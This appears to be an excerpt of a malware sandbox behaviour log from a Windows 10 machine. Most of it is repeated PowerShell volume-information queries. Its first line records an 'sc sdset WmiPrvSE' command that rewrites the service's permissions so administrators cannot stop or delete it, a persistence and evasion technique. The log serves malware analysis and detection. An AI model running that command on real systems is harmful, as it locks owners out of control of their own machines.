Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
